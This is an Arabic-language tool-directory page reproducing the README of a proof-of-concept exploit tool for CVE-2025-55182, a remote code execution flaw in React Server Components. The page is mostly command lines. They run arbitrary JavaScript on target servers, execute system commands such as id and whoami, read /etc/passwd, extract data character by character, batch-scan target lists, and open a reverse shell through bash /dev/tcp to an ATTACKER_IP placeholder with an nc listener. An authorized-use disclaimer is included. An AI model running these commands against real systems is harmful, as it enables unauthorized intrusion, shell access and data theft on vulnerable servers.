Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
React2Shell-CVE-2025-55182 — POC React2Shell-CVE-2025-55182 | Kitploit
أدوات/GitHubGitHub/shadowroot97/react2shell-cve-2025-55182
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعدتطوير الحمولات
GitHubshadowroot97/react2shell-cve-2025-55182

React2Shell-CVE-2025-55182

POC React2Shell-CVE-2025-55182

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

CVE-2025-55182 - React2Shell

root@kitploit:~
    ____  _____    _    ____ _____ ____  ____  _   _ _____ _     _
   |  _ \| ____|  / \  / ___|_   _|___ \/ ___|| | | | ____| |   | |
   | |_) |  _|   / _ \| |     | |   __) \___ \| |_| |  _| | |   | |
   |  _ <| |___ / ___ \ |___  | |  / __/ ___) |  _  | |___| |___| |___
   |_| \_\_____/_/   \_\____| |_| |_____|____/|_| |_|_____|_____|_____|
                                                    [ CVE-2025-55182 ]

ماسح تنفيذ الأوامر عن بُعد لمكونات خادم React (RSC)

CVE Python


الاعتمادات

الدورالاسمالرابط
البحث الأصليLachlan Davidsongithub.com/lachlan2k

استنادًا إلى الإثبات الأصلي: React2Shell-CVE-2025-55182-original-poc


نظرة عامة

React2Shell هو ماسح أمني شامل لـ CVE-2025-55182، وهو ثغرة تنفيذ أوامر عن بُعد (RCE) حرجة تؤثر على تطبيقات مكونات خادم React (RSC). تسمح هذه الثغرة للمهاجمين غير المصادق عليهم بتنفيذ كود جافا سكريبت عشوائي على الخادم من خلال إلغاء التسلسل غير الآمن في بروتوكول React Flight.

الميزات الرئيسية

  • اختبار متعدد المتغيرات: يختبر 4 هياكل حمولات مختلفة من البحث الأصلي
  • كشف الإصدارات: تحديد إصدارات React والأطر الضعيفة
  • التحقق من RCE: تأكيد تنفيذ الكود عبر تغيير الملخص، التوقيت، واستدعاءات OOB
  • اختبار OOB: دعم لـ Burp Collaborator و Interactsh
  • حمولات مخصصة: تنفيذ جافا سكريبت عشوائي على الخوادم الضعيفة
  • استخراج البيانات: تسريب البيانات حرفًا بحرف
  • إخراج احترافي: إخراج طرفية نظيف وملون مع جمع الأدلة

التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Shadowroot97/POC-React2Shell-CVE-2025-55182.git
cd POC-React2Shell-CVE-2025-55182

# Install dependencies
pip install requests

# Run the scanner
python3 exploit_cve_2025_55182_v2.py -h

الاستخدام

root@kitploit:~
usage: exploit_cve_2025_55182_v2.py [-h] [-t TARGET] [-f FILE] [-m {version,verify,custom}]
                                    [--js JS] [--extract] [--sleep SECONDS]
                                    [--callback URL] [--dns DOMAIN] [-v]
                                    [--no-color] [--timeout TIMEOUT]

أوضاع المسح

1. وضع الإصدار (افتراضي)

يكشف بشكل سلبي عن إصدارات React والأطر الضعيفة:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -t https://target.com

2. وضع التحقق (-m verify)

يؤكد RCE بنشاط باستخدام تقنيات متعددة وجميع المتغيرات الأربعة للحمولة:

root@kitploit:~
# التحقق الأساسي (تغيير الملخص)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# مع التحقق القائم على الوقت
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --sleep 5

# مع استدعاء OOB (Burp Collaborator)
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify --callback abc123.oastify.com

# التحقق الكامل مع إخراج مفصل
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback abc123.oastify.com --dns abc123.oastify.com -v

3. وضع مخصص (-m custom)

تنفيذ حمولات جافا سكريبت عشوائية:

root@kitploit:~
# الحصول على إصدار Node.js
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# تنفيذ أمر نظام
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('id').toString()" --extract

# قراءة ملف
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('fs').readFileSync('/etc/passwd','utf8')" --extract

4. المسح الدفعي (-f)

مسح عناوين URL متعددة من ملف وعرض الأهداف الضعيفة فقط:

root@kitploit:~
python3 exploit_cve_2025_55182_v2.py -f targets.txt

أمثلة

مسح أساسي

root@kitploit:~
# كشف الإصدار (الوضع الافتراضي)
python3 exploit_cve_2025_55182_v2.py -t https://target.com

# التحقق من RCE
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify

# مسح دفعي لأهداف متعددة
python3 exploit_cve_2025_55182_v2.py -f targets.txt

# إخراج مفصل
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify -v

استخدام متقدم

root@kitploit:~
# التحقق القائم على الوقت + OOB
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m verify \
    --sleep 5 --callback your-id.oastify.com

# استخراج معلومات الخادم
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.version" --extract

# تنفيذ أمر
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "require('child_process').execSync('whoami').toString()" --extract

شل عكسي

root@kitploit:~
# بدء المستمع
nc -lvnp 443

# تنفيذ الشل العكسي
python3 exploit_cve_2025_55182_v2.py -t https://target.com -m custom \
    --js "process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1\"')"

إخلاء مسؤولية

هذه الأداة مقدمة لاختبارات الأمان المصرح بها والأغراض التعليمية فقط.

  • استخدم فقط ضد الأنظمة التي تملكها أو لديك إذن صريح لاختبارها
  • الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني
  • المؤلفون غير مسؤولين عن إساءة استخدام هذه الأداة
  • اتبع دائمًا ممارسات الكشف المسؤول

المراجع

  • CVE-2025-55182 - NVD
  • الإثبات الأصلي بواسطة Lachlan Davidson
  • استشارة أمان React
  • استشارة أمان Next.js
  • وثائق مكونات خادم React
تنزيل الأداة
الوسيطةالوصف
-t, --targetعنوان URL الهدف (مثل https://example.com)
-f, --fileملف يحتوي على قائمة عناوين URL (واحد في كل سطر) للمسح الدفعي
-m, --modeوضع المسح: version (افتراضي)، verify، أو custom
--jsكود جافا سكريبت للوضع المخصص
--extractاستخراج نتيجة السلسلة حرفًا بحرف
--sleep SECONDSالتحقق من RCE القائم على الوقت (وضع verify)
--callback URLعنوان URL لاستدعاء HTTP لاختبار OOB (وضع verify)
--dns DOMAINنطاق استدعاء DNS لاختبار OOB (وضع verify)
-v, --verboseإخراج مفصل مع تفاصيل الحمولة
--no-colorتعطيل الإخراج الملون
--timeout SECONDSمهلة طلب HTTP (الافتراضي: 30)